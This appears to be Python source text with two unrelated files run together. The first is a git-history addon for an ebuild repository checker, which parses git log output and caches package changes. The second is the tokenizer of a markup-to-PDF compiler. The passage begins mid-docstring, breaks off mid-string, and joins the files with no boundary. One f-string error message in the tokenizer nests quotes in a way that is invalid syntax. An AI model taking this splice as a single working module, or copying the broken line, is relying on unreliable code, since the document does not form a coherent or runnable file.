log output parsing support.""" # git command to run on the targeted repo _git_cmd = 'git log --name-status --diff-filter=ARMD -z' # custom git log format lines, see the "PRETTY FORMATS" section of # the git log man page for details _format = () # path regexes for git log parsing, validation is handled on instantiation _ebuild_re = re.compile(r'^(?P<category>[^/]+)/[^/]+/(?P<package>[^/]+)\.ebuild$') def __init__(self, path, commit_range): self.path = os.path.realpath(path) cmd = shlex.split(self._git_cmd) cmd.append(f"--pretty=tformat:%n{'%n'.join(self._format)}") cmd.append(commit_range) self.git_log = GitLog(cmd, self.path) # discard the initial newline next(self.git_log) def __iter__(self): return self def __next__(self): raise NotImplementedError(self.__next__) @property def changes(self): """Generator of file change status with changed packages.""" changes = deque(next(self.git_log).strip('\x00').split('\x00')) while changes: status = changes.popleft() if status.startswith('R'): # matched R status change 
status = 'R' old = changes.popleft() new = changes.popleft() if (mo := self._ebuild_re.match(old)) and (mn := self._ebuild_re.match(new)): try: old_pkg = atom_cls(f"={mo.group('category')}/{mo.group('package')}") new_pkg = atom_cls(f"={mn.group('category')}/{mn.group('package')}") yield status, [old_pkg, new_pkg] except MalformedAtom: continue else: # matched ADM status change path = changes.popleft() if mo := self._ebuild_re.match(path): try: pkg = atom_cls(f"={mo.group('category')}/{mo.group('package')}") yield status, [pkg] except MalformedAtom: continue class GitRepoCommits(_ParseGitRepo): """Parse git log output into an iterator of commit objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit timestamp '%an <%ae>', # Author Name <author@email.com> '%cn <%ce>', # Committer Name <committer@email.com> '%B', # commit message ) def __next__(self): commit_hash = next(self.git_log) commit_time = int(next(self.git_log)) author = next(self.git_log) committer = next(self.git_log) message = list(takewhile(lambda x: x != '\x00', self.git_log)) pkgs = defaultdict(set) for status, atoms in self.changes: if status == 'R': old, new = atoms pkgs['A'].add(new) pkgs['D'].add(old) else: pkgs[status].update(atoms) return GitCommit(commit_hash, commit_time, author, committer, message, ImmutableDict(pkgs)) class GitRepoPkgs(_ParseGitRepo): """Parse git log output into an iterator of package change objects.""" _format = ( '%h', # abbreviated commit hash '%ct', # commit time ) def __init__(self, *args, local=False): super().__init__(*args) self.local = local self._pkgs = deque() def __next__(self): while True: try: return self._pkgs.popleft() except IndexError: commit_hash = next(self.git_log) commit_time = int(next(self.git_log).rstrip('\x00')) self._pkg_changes(commit_hash, commit_time) def _pkg_changes(self, commit_hash, commit_time): """Queue package change objects from git log file changes.""" for status, pkgs in self.changes: if status == 'R': old, new = pkgs if not self.local: # treat rename as addition and removal self._pkgs.append( GitPkgChange(new, 'A', commit_hash, commit_time)) self._pkgs.append( GitPkgChange(old, 'D', commit_hash, commit_time)) else: # renames are split into add/remove ops at # the check level for the local commits repo self._pkgs.append(GitPkgChange( new, 'R', commit_hash, commit_time, old)) else: self._pkgs.append(GitPkgChange(pkgs[0], status, commit_hash, commit_time)) class _GitCommitPkg(cpv.VersionedCPV): """Fake packages encapsulating commits parsed from git log.""" def __init__(self, category, package, status, version, time, commit, old=None): super().__init__(category, package, version) # add additional attrs sf = object.__setattr__ sf(self, 'time', time) sf(self, 'status', status) sf(self, 'commit', commit) sf(self, 'old', old) def old_pkg(self): """Create a new object from a rename commit's old atom.""" return self.__class__( self.old.category, self.old.package, self.status, self.old.version, self.time, self.commit) class GitChangedRepo(SimpleTree): """Historical git repo consisting of the latest changed packages.""" # selected pkg status filter _status_filter = {'A', 'R', 'M', 'D'} def __init__(self, *args, **kwargs): kwargs.setdefault('pkg_klass', _GitCommitPkg) super().__init__(*args, **kwargs) def _get_versions(self, cp): versions = [] for status, data in self.cpv_dict[cp[0]][cp[1]].items(): if status in self._status_filter: for commit in data: versions.append((status, commit)) return versions def _internal_gen_candidates(self, candidates, sorter, 
raw_pkg_cls, **kwargs): for cp in sorter(candidates): yield from sorter( raw_pkg_cls(cp[0], cp[1], status, *commit) for status, commit in self.versions.get(cp, ())) class GitModifiedRepo(GitChangedRepo): """Historical git repo consisting of the latest modified packages.""" _status_filter = {'A', 'M'} class GitAddedRepo(GitChangedRepo): """Historical git repo consisting of added packages.""" _status_filter = {'A'} class GitRemovedRepo(GitChangedRepo): """Historical git repo consisting of removed packages.""" _status_filter = {'D'} class _ScanGit(argparse.Action): """Argparse action that enables scanning against git commits or staged changes.""" def __init__(self, *args, staged=False, **kwargs): super().__init__(*args, **kwargs) if staged: default_ref = 'HEAD' diff_cmd = ['git', 'diff-index', '--name-only', '--cached', '-z'] else: default_ref = 'origin..HEAD' diff_cmd = ['git', 'diff-tree', '-r', '--name-only', '-z'] self.staged = staged self.default_ref = default_ref self.diff_cmd = diff_cmd def generate_restrictions(self, parser, namespace, ref): """Generate restrictions for a given diff command.""" try: p = subprocess.run( self.diff_cmd + [ref], stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=namespace.target_repo.location, check=True, encoding='utf8') except FileNotFoundError as e: parser.error(str(e)) except subprocess.CalledProcessError as e: error = e.stderr.splitlines()[0] parser.error(f'failed running git: {error}') if not p.stdout: # no changes exist, exit early parser.exit() eclass_re = re.compile(r'^eclass/(?P<eclass>\S+)\.eclass$') eclasses, profiles, pkgs = OrderedSet(), OrderedSet(), OrderedSet() for path in p.stdout.strip('\x00').split('\x00'): path_components = path.split(os.sep) if mo := eclass_re.match(path): eclasses.add(mo.group('eclass')) elif path_components[0] == 'profiles': profiles.add(path) elif path_components[0] in namespace.target_repo.categories: try: pkgs.add(atom_cls(os.sep.join(path_components[:2]))) except MalformedAtom: continue restrictions = [] if pkgs: restrict = packages.OrRestriction(*pkgs) restrictions.append((base.package_scope, restrict)) if eclasses: restrictions.append((base.eclass_scope, eclasses)) if profiles: restrictions.append((base.profile_node_scope, profiles)) # no relevant targets, exit early if not restrictions: parser.exit() return restrictions def __call__(self, parser, namespace, value, option_string=None): if namespace.targets: targets = ' '.join(namespace.targets) s = pluralism(namespace.targets) parser.error(f'{option_string} is mutually exclusive with target{s}: {targets}') if not self.staged: # avoid circular import issues from .. import objects # enable git checks namespace.enabled_checks.update(objects.CHECKS.select(GitCommitsCheck).values()) # determine target ref ref = value if value is not None else self.default_ref setattr(namespace, self.dest, ref) # generate scanning restrictions namespace.restrictions = self.generate_restrictions(parser, namespace, ref) # ignore irrelevant changes during scan namespace.contexts.append(GitStash(namespace.target_repo.location, staged=self.staged)) class GitAddon(caches.CachedAddon): """Git repo support for various checks. Pkgcheck can create virtual package repos from a given git repo's history in order to provide more info for checks relating to stable requests, outdated blockers, or local commits. These virtual repos are cached and updated every run if new commits are detected. Git repos must have a supported config in order to work properly. 
Specifically, pkgcheck assumes that the origin branch exists and tracks upstream. Additionally, the origin/HEAD ref must exist. If it doesn't, running ``git remote set-head origin master`` or similar for other branches will create it. """ # cache registry cache = caches.CacheData(type='git', file='git.pickle', version=5) @classmethod def mangle_argparser(cls, parser): group = parser.add_argument_group('git', docs=cls.__doc__) git_opts = group.add_mutually_exclusive_group() git_opts.add_argument( '--commits', nargs='?', default=False, metavar='tree-ish', action=arghparse.Delayed, target=_ScanGit, priority=10, help='determine scan targets from unpushed commits', docs=""" Targets are determined from the committed changes compared to a given reference that defaults to the repo's origin. For example, to scan all the packages that have been changed in the current branch compared to the branch named 'old' use ``pkgcheck scan --commits old``. For two separate branches named 'old' and 'new' use ``pkgcheck scan --commits old..new``. """) git_opts.add_argument( '--staged', nargs='?', default=False, metavar='tree-ish', action=arghparse.Delayed, target=partial(_ScanGit, staged=True), priority=10, help='determine scan targets from staged changes', docs=""" Targets are determined using all staged changes for the git repo. Unstaged changes and untracked files are ignored by temporarily stashing them during the scanning process. """) def __init__(self, *args): super().__init__(*args) try: find_binary('git') except CommandNotFound: raise caches.CacheDisabled(self.cache) # mapping of repo locations to their corresponding git repo caches self._cached_repos = {} @jit_attr def _gitignore(self): """Load a repo's .gitignore and .git/info/exclude files for path matching.""" patterns = [] for path in ('.gitignore', '.git/info/exclude'): try: with open(pjoin(self.options.target_repo.location, path)) as f: patterns.extend(f) except (FileNotFoundError, IOError): pass if patterns: return PathSpec.from_lines('gitwildmatch', patterns) return None def gitignored(self, path): """Determine if a given path in a repository is matched by .gitignore settings.""" if self._gitignore is not None: if path.startswith(self.options.target_repo.location): repo_prefix_len = len(self.options.target_repo.location) + 1 path = path[repo_prefix_len:] return self._gitignore.match_file(path) return False @staticmethod def _get_commit_hash(path, commit='origin/HEAD'): """Retrieve a git repo's commit hash for a specific commit object.""" try: p = subprocess.run( ['git', 'rev-parse', commit], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, cwd=path, check=True, encoding='utf8') except subprocess.CalledProcessError: raise GitError(f'failed retrieving commit hash for git repo: {path!r}') return p.stdout.strip() @staticmethod def pkg_history(repo, commit_range, data=None, local=False, verbosity=-1): """Create or update historical package data for a given commit range.""" if data is None: data = {} seen = set() with base.ProgressManager(verbosity=verbosity) as progress: for pkg in GitRepoPkgs(repo.location, commit_range, local=local): atom = pkg.atom key = (atom, pkg.status) if key not in seen: seen.add(key) if local: commit = (atom.fullver, pkg.commit_time, pkg.commit, pkg.old) else: date = datetime.fromtimestamp(pkg.commit_time).strftime('%Y-%m-%d') progress(f'{repo} -- updating git cache: commit date: {date}') commit = (atom.fullver, pkg.commit_time, pkg.commit) data.setdefault(atom.category, {}).setdefault( atom.package, 
{}).setdefault(pkg.status, []).append(commit) return data def update_cache(self, force=False): """Update related cache and push updates to disk.""" for repo in self.options.target_repo.trees: try: commit = self._get_commit_hash(repo.location) except GitError: continue # initialize cache file location cache_file = self.cache_file(repo) git_cache = None cache_repo = True if not force: git_cache = self.load_cache(cache_file) if git_cache is None or commit != git_cache.commit: logger.debug('updating %s git repo cache to %s', repo, commit[:13]) if git_cache is None: data = {} commit_range = 'origin/HEAD' else: data = git_cache.data commit_range = f'{git_cache.commit}..origin/HEAD' try: self.pkg_history( repo, commit_range, data=data, verbosity=self.options.verbosity) except GitError as e: raise PkgcheckUserException(str(e)) git_cache = GitCache(data, self.cache, commit=commit) else: cache_repo = False if git_cache: self._cached_repos[repo.location] = git_cache # push repo to disk if it was created or updated if cache_repo: self.save_cache(git_cache, cache_file) def cached_repo(self, repo_cls): git_repos = [] for repo in self.options.target_repo.trees: git_cache = self._cached_repos.get(repo.location, {}) git_repos.append(repo_cls(git_cache, repo_id=f'{repo.repo_id}-history')) if len(git_repos) > 1: return multiplex.tree(*git_repos) return git_repos[0] def commits_repo(self, repo_cls): target_repo = self.options.target_repo data = {} try: origin = self._get_commit_hash(target_repo.location) head = self._get_commit_hash(target_repo.location, commit='HEAD') if origin != head: data = self.pkg_history(target_repo, 'origin/HEAD..HEAD', local=True) except GitError as e: raise PkgcheckUserException(str(e)) repo_id = f'{target_repo.repo_id}-commits' return repo_cls(data, repo_id=repo_id) def commits(self): target_repo = self.options.target_repo commits = () try: origin = self._get_commit_hash(target_repo.location) head = self._get_commit_hash(target_repo.location, commit='HEAD') if origin != head: commits = GitRepoCommits(target_repo.location, 'origin/HEAD..HEAD') except GitError as e: raise PkgcheckUserException(str(e)) return iter(commits)
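# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the addon above). It shows how the
# pieces fit together: GitRepoCommits yields GitCommit objects for a commit
# range, while pkg_history() folds package changes into the nested
# {category: {package: {status: [(fullver, commit_time, hash), ...]}}} dict
# consumed by GitChangedRepo and its subclasses. The repository path below is
# a placeholder and the snippet assumes the definitions above are in scope.

def _print_unpushed_commits(repo_path='/path/to/ebuild/repo'):
    """Print a one-line summary for every unpushed commit in the repo."""
    try:
        for commit in GitRepoCommits(repo_path, 'origin/HEAD..HEAD'):
            summary = commit.message[0] if commit.message else ''
            added = len(commit.pkgs.get('A', ()))
            removed = len(commit.pkgs.get('D', ()))
            print(f'{commit.hash} (+{added}/-{removed} pkgs): {summary}')
    except GitError as exc:
        print(f'git failure: {exc}')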
""" This is the main file that holds the Tokenizer, Parser, and Interpreter that actually compile the PDF. """ import os.path as path import re import copy as _copy from decimal import Decimal from placer.placer import Placer from constants import CMND_CHARS, END_LINE_CHARS, ALIGNMENT, TT, TT_M, WHITE_SPACE_CHARS, NON_END_LINE_CHARS, PB_NUM_TABS, PB_NAME_SPACE, STD_FILE_ENDING, STD_LIB_FILE_NAME, OUT_TAB from tools import assure_decimal, is_escaped, is_escaping, exec_python, eval_python, string_with_arrows, trimmed, print_progress_bar, prog_bar_prefix, calc_prog_bar_refresh_rate, assert_instance from marked_up_text import MarkedUpText from markup import Markup, MarkupStart, MarkupEnd from toolbox import ToolBox from placer.placers.naiveplacer import NaivePlacer # ----------------------------------------------------------------------------- # Errors That Can Occur While Compiling class Error(Exception): def __init__(self, pos_start, pos_end, error_name, details): self.pos_start = pos_start self.pos_end = pos_end self.error_name = error_name self.details = details def as_string(self): result = f'Line {self.pos_start.ln + 1}, Column {self.pos_start.col + 1}, in file {self.pos_start.file_path}\n' result += f' {self.error_name} Occured: {self.details}' result += '\n' + string_with_arrows(self.pos_start.file_text, self.pos_start, self.pos_end) return result class ExpectedValidCmndNameError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Valid Command Name', details) class IllegalCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Illegal Character Error', details) class ExpectedCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Character Error', details) class InvalidSyntaxError(Error): def __init__(self, pos_start, pos_end, details=''): super().__init__(pos_start, pos_end, 'Invalid Syntax Error', details) class RunTimeError(Error): def __init__(self, pos_start, pos_end, details, context): super().__init__(pos_start, pos_end, 'Run-Time Error', details) self.context = context def generate_traceback(self): result = '' pos = self.pos_start ctx = self.context while ctx is not None: result = f' File {pos.file_path}, line {pos.ln + 1}, in {ctx.display_name}\n' + result pos = ctx.entry_pos ctx = ctx.parent return 'Traceback (most recent call last):\n' + result class PythonException(RunTimeError): def __init__(self, pos_start, pos_end, details, python_error, context): import traceback self.python_error = f'{python_error.exc_trace}' super().__init__(pos_start, pos_end, details, context) self.error_name = 'Python Exception' def as_string(self): string = super().as_string() string += '\nHere is the Python Exception:\n\n' string += f'{self.python_error}' return string # ----------------------------------------------------------------------------- # Position Class class Position: """ Position in a Tokenized file or a file that is being tokenized. 
""" __slots__ = ['idx', 'ln', 'col', 'file_path', 'file_text'] def __init__(self, idx, ln, col, file_path, file_text): self.idx = idx self.ln = ln self.col = col self.file_path = file_path # The path tot he file that this is a position in self.file_text = file_text # The text of the file this is a position in def advance(self, current_char=None): self.idx += 1 self.col += 1 if current_char in END_LINE_CHARS: self.ln += 1 self.col = 0 return self def copy(self): return Position(self.idx, self.ln, self.col, self.file_path, self.file_text) def __repr__(self): file = self.file_path.split('\\')[-1] return f"{self.__class__.__name__}(line {self.ln}, col {self.col}, in {file})" # ----------------------------------------------------------------------------- # File Class class File: __slots__ = ['file_path', 'raw_text', 'tokens', 'ast', 'import_context', 'import_tokens', 'being_run'] def __init__(self, file_path): self.file_path = file_path # Path to file # Fields set in Compiler._compiler_import_file self.raw_text = None # The raw text that is in the file self.tokens = None # The tokens that make up the File once it has been tokenized self.ast = None # The Abstract Syntax tree from the Tokens being Parsed # Fields set by Compiler._import_file self.import_context = None # The context obtained by running the file, can be used to import this file into another file self.import_tokens = None # The tokens to add to the token_document when the file is imported self.being_run = False # ----------------------------------------------------------------------------- # Token Class class Token: __slots__ = ['start_pos', 'end_pos', 'type', 'value', 'space_before'] def __init__(self, type, value, start_pos, end_pos=None, space_before=True): self.start_pos = start_pos if isinstance(space_before, bool): # Space before is whether there should be a space before the token # when it is put on the page. This is so that tokens like the # '=' and '{' that are singled out of a sentence can still tell # the placer whether there was space before them because the # default is to just put a space before each token is placed down. self.space_before = space_before else: self.space_before = (space_before in WHITE_SPACE_CHARS) if end_pos is None: end_pos = self.start_pos.copy() end_pos.advance() # Necessary if you want errors to display the errors correctly because they use start_pos - end_pos self.end_pos = end_pos else: self.end_pos = end_pos self.type = type self.value = str(value) if type == TT.WORD and value == '': raise Exception(f'An empty string has been made into a Token. This is a compiler problem. {self}') def matches(self, token_type, value): """ Checks if the given token_type and value matches this one. """ return self.type == token_type and self.value == value def copy(self): start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return Token(self.type, self.value, start_pos, end_pos, self.space_before) def gen_pass_2_python(self, locals): """ Generates a SecondPassPythonToken that can store the locals that should be provided when the python code is run in the Placer. The Placer already has the globals that should be provided. 
""" start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return SecondPassPythonToken(self.type, self.value, start_pos, end_pos, self.space_before, locals) def __repr__(self): """ This is what is called when you print this object since __str__ is undefined. """ return f"Token(\"<{self.type}>\":{" " if self.space_before else ""}{self.value})" class SecondPassPythonToken(Token): __slots__ = Token.__slots__[:] __slots__.extend(['locals']) def __init__(self, type, value, start_pos, end_pos=None, space_before=False, locals=None): super().__init__(type, value, start_pos, end_pos, space_before) self.locals = locals # ----------------------------------------------------------------------------- # Tokenizer Class class Tokenizer: """ Takes raw text and tokenizes it. """ def __init__(self, file_path, file_text, starting_position=None, print_progress_bar=False): super().__init__() self._print_progress_bar = print_progress_bar if starting_position: # Parse assuming that you are starting at the given line and column int he file self._pos = starting_position.copy() self._pos.idx = -1 else: # Parse assuming that you are starting at the beginning of the file self._pos = Position(-1, 0, -1, file_path, file_text) self._text = file_text self._current_char = None self._previous_char = '' self._plain_text = '' self._plain_text_start_pos = None self._space_before_plaintext = False self._unpaired_cbrackets = 0 self._unpaired_oparens = 0 self._tokens = [] self._advance() def _advance(self, num=1): """Advances to the next character in the text if it should advance.""" for i in range(num): self._previous_char = self._current_char self._pos.advance(self._current_char) self._current_char = self._text[self._pos.idx] if self._pos.idx < len(self._text) else None @staticmethod def plaintext_tokens_for_str(string, count_starting_space=False): """ If you want to write plaintext to the placer and the string to be interpreted only as plaintext, then this is what you use to tokenize the string. Just take the return-ed string from this method and give it to the place_text method of the Placer. 
If count_starting_space is True, then it will treat the whitespace before the first letter as actual space that could produce a paragraph break """ tokens = [] idx = -1 cc = None def next_tok(idx): idx += 1 return string[idx] if idx < len(string) else None, idx def try_append_word(curr_word, space_before): curr_word = re.sub('(\s)+', '', curr_word) if len(curr_word) > 0: tokens.append(Token(TT.WORD, curr_word, DUMMY_POSITION.copy(), space_before=space_before)) cc, idx = next_tok(idx) if not count_starting_space: # Eat all end line chars at beginning so no paragraph break at beginning while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) space_before = False curr_word = '' while cc is not None: if cc in NON_END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True while (cc is not None) and (cc in NON_END_LINE_CHARS): cc, idx, = next_tok(idx) continue elif cc in END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True if cc in END_LINE_CHARS: tokens.append(Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, DUMMY_POSITION.copy())) cc, idx = next_tok(idx) while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) continue else: curr_word += cc cc, idx = next_tok(idx) try_append_word(curr_word, space_before) return tokens @staticmethod def marked_up_text_for_tokens(list_of_tokens): """ Returns a MarkedUpText object that is equivalent to the List of Tokens given. """ text = MarkedUpText() curr_index = 0 pending_markups = [] for t in list_of_tokens: if isinstance(t, (MarkupStart, MarkupEnd)): text.add_markup_start_or_end(t, curr_index) elif isinstance(t, Token): if t.type == TT.PARAGRAPH_BREAK: # Add two newlines to signify a paragraph break text += '\n\n' curr_index += 2 elif t.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): markup = Markup() markup.add_python(t) text.add_markup(markup, curr_index) else: if t.space_before: text += ' ' curr_index += 1 text += t.value curr_index += len(t.value) else: raise Exception(f'{t} was in the list of tokens given to be changed into MarkedUpText, but MarkedUpText can\'t denote it. This is a compiler problem, tell the makers of the compiler that you got this error.') text_len = len(text) #print(f'curr_index = {curr_index}, text_len = {text_len}, markups = {None if text_len not in text._markups else text._markups[text_len]}') if text_len > 0 and text_len in text._markups: markups = text._markups.pop(text_len) index = text_len - 1 if index in text._markups: text._markups[index].extend(markups) else: text._markups[index] = markups #print(f'AFTER markups = {None if index not in text._markups else text._markups[index]}') return text @staticmethod def tokens_for_marked_up_text(marked_up_text): """ Returns a list of tokens for the given MarkedUpText. 
""" def try_token(token_value, token_list): if len(token_value) > 0: space_before = (token_value[0] in WHITE_SPACE_CHARS) tokens = Tokenizer.plaintext_tokens_for_str(str(token_value), True) token_value = '' if len(tokens) > 0: tokens[0].space_before = space_before token_list.extend(tokens) return token_value, token_list token_list = [] token_value = '' pending_end_markups = [] for i, char in enumerate(marked_up_text): markups = marked_up_text.markups_for_index(i) # markups is a list of MarkupStart and MarkupEnd objects or # None if there are None # Since Markups are inclusive of their index, the MarkupStarts must # be appended before the next char and the MarkupEnds must be # appended after the next character is added if markups: token_value, token_list = try_token(token_value, token_list) for markup in markups: if isinstance(markup, MarkupStart): token_list.append(markup) else: pending_end_markups.append(markup) token_value += char if pending_end_markups: token_value, token_list = try_token(token_value, token_list) for markup in pending_end_markups: token_list.append(markup) pending_end_markups = [] token_value, token_list = try_token(token_value, token_list) return token_list _what_can_be_escaped = {'{', '}', '=', '\\', '(', ')', ','} def tokenize(self, file=True): """ Turn the raw text into tokens that the compiler can use. If file is true, the tokenizer assumes that the text is from a file and bookends the tokens with TT.FILE_START and TT.FILE_END """ self._tokens = [] self._plain_text = '' what_can_be_escaped = self._what_can_be_escaped if file: self._tokens.append(Token(TT.FILE_START, '<FILE START>', self._pos.copy())) print_progress = self._print_progress_bar if print_progress: text_len = len(self._text) prefix = prog_bar_prefix('Tokenizing', self._pos.file_path) refresh = calc_prog_bar_refresh_rate(text_len) full_bar_printed = False if print_progress_bar(0, text_len, prefix): full_bar_printed = True # By default, all text is plain text until something says otherwise while self._current_char is not None: i = self._pos.idx if print_progress and (i % refresh) == 0: print_progress_bar(i, text_len, prefix) cc = self._current_char t = None if is_escaped(i, self._text, what_can_be_escaped): self._plain_text_char() elif is_escaping(i, self._text, what_can_be_escaped): self._advance() # Just advance because it is just escaping something else elif cc in END_LINE_CHARS: self._try_word_token() self._advance() pos_start = self._pos.copy() if self._current_char in END_LINE_CHARS: while self._current_char in END_LINE_CHARS: # Do nothing, just eat the END_LINE_CHARS now that we know that there is a PARAGRAPH_BREAK self._advance() t = Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, pos_start, self._pos.copy()) elif cc in NON_END_LINE_CHARS: self._try_word_token() self._advance() elif cc == '{': if self._unpaired_cbrackets == 0: self._first_unpaired_bracket_pos = self._pos.copy() self._unpaired_cbrackets += 1 t = Token(TT.OCBRACE, '{', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '}': self._unpaired_cbrackets -= 1 if self._unpaired_cbrackets < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing curly bracket "}". 
You need to add an open curly bracket "{" before it or escape it by putting a backslash before it.') t = Token(TT.CCBRACE, '}', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '=': t = Token(TT.EQUAL_SIGN, '=', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '(': if self._unpaired_oparens == 0: self._first_unpaired_oparens_pos = self._pos.copy() self._unpaired_oparens += 1 t = Token(TT.OPAREN, '(', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ')': self._unpaired_oparens -= 1 if self._unpaired_oparens < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing parenthesis ")". You need to add an open curly bracket "(" before it or escape it by putting a backslash before it.') t = Token(TT.CPAREN, ')', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ',': t = Token(TT.COMMA, ',', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '\\': t = self._tokenize_cntrl_seq() else: self._plain_text_char() if t is not None: # Actually append the Token (or list of tokens) if there is a Token to append self._try_word_token() if isinstance(t, Token): self._tokens.append(t) else: # t must be a list of tokens self._tokens.extend(t) if print_progress and not full_bar_printed: print_progress_bar(text_len, text_len, prefix) if self._unpaired_cbrackets > 0: raise InvalidSyntaxError(self._first_unpaired_bracket_pos.copy(), self._first_unpaired_bracket_pos.copy().advance(), f'{self._unpaired_cbrackets} unpaired, unescaped, opening curly bracket(s) '{' starting from this opening curly bracket. Either escape each one by putting a backslash before them or pair them with a closing curly bracket '}".') if self._unpaired_oparens > 0: raise InvalidSyntaxError(self._first_unpaired_oparens_pos.copy(), self._first_unpaired_oparens_pos.copy().advance(), f'{self._unpaired_oparens} unpaired, unescaped, opening parenthes(es) "(" starting from this open parenthes(es). Either escape each one by putting a backslash before them or pair them with a closing parenthesis ")".') self._try_word_token() if file: self._tokens.append(Token(TT.FILE_END, '<FILE END>', self._pos.copy())) return self._tokens # ------------------------------------------------------------------------- # Parsing Methods def _tokenize_cntrl_seq(self): """ Parse a control sequence. 
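        A control sequence is anything introduced by an unescaped backslash:
        a multi-line or one-line first/second pass Python section, a single-
        or multi-line comment, or, failing all of those, a command identifier
        such as \\bold (handled by _tokenize_identifier).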
""" t = None pos_start = self._pos.copy() # NOTE: Multi-line matches tend be longer and so need to come before # single-line matches because shorter matches will match before longer # matches, even if the longer match would have worked had it been tried # Multiple Line Python ---------------------- if self._match(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_END, 1, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, use_eval=True) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_END, 2, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, use_eval=True) # One Line Python ----------------------- elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EXEC_END, 1, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, one_line=True, use_eval=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EXEC_END, 2, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, one_line=True, use_eval=True) # Comment ---------------------- elif self._match(TT_M.MULTI_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=False) elif self._match(TT_M.SINGLE_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=True) # Command -------------------------- else: # It is an identifier, so tokenize it t = self._tokenize_identifier() return t def _tokenize_python(self, end_codes, pass_num, pos_start, one_line=False, use_eval=False): """ Parses the string from self._pos as python code until one of the end_codes are reached. If one_line is true, that means that this python statement is supposed to only be one line so it cannot turn the rest of the file into python. """ python_str = '' pos_end = self._pos.copy() match_found = False while self._current_char is not None: if self._match(end_codes, False): # Only eat the chars if they are not in the END_LINE_CHARS. # Otherwise it is needed in order to determine whether to put # in a PARAGRAPH_BREAK if not self._current_char in END_LINE_CHARS: self._match(end_codes) match_found = True break else: # Since python has not ended yet, just add the given char to it python_str += self._current_char self._advance() if (self._current_char is None) and (not match_found) and (not one_line): raise InvalidSyntaxError(pos_start, pos_end, f'You made the rest of your file Python because there was no matching character sequence to end the Python section of your document denoted by this character sequence.') pos_end = self._pos.copy() if pass_num == 1: if use_eval: return Token(TT.EVAL_PYTH1, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH1, python_str, pos_start, pos_end) else: if use_eval: return Token(TT.EVAL_PYTH2, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH2, python_str, pos_start, pos_end) def _tokenize_comment(self, pos_start, one_line=False): """ Parses a comment, basically just eating any characters it finds until the comment is done. 
None of the characters are put into any Token, so the Parser will never even see them. """ pos_end = self._pos.copy() if one_line: # Its a one_line comment while self._current_char is not None: if self._match(TT_M.SINGLE_LINE_COMMENT_END): break else: self._advance() else: found_match = False # it's a continous comment, so parse until '<-%\' or '<-#\' is found while self._current_char is not None: if self._match(TT_M.MULTI_LINE_COMMENT_END): found_match = True break else: self._advance() if self._current_char is None and not found_match: raise InvalidSyntaxError(pos_start, pos_end, 'You commented out the rest of your file because there was no matching "<-%\\" or "<-#\\" to end the comment.') if len(self._tokens) > 0 and self._tokens[-1].type == TT.PARAGRAPH_BREAK: # Need to eat all end line white space now so that another # PARAGRAPH_BREAK cannot be produced due to this comment text being # ignored and there being white space before it. Two PARAGRAPH_BREAKs # next to eachother breaks all grammar rules and causes the Parser # to terminate early (i.e. before it reaches the FILE_END token) while self._current_char in END_LINE_CHARS: self._advance() def _tokenize_identifier(self): """ Tokenize an identifier like \\bold or \\i """ identifier_name = '' start_pos = self._pos.copy() space_before = self._previous_char #tokens = [] #tokens.append(Token(TT.BACKSLASH, '\\', start_pos.copy(), self._pos.copy(), space_before=space_before)) self._advance() # advance past '\\' problem_start = self._pos.copy() while self._current_char is not None: if self._current_char in CMND_CHARS: identifier_name += self._current_char self._advance() else: if len(identifier_name) == 0: raise ExpectedValidCmndNameError(problem_start, self._pos.copy(), f'All commands must specify a 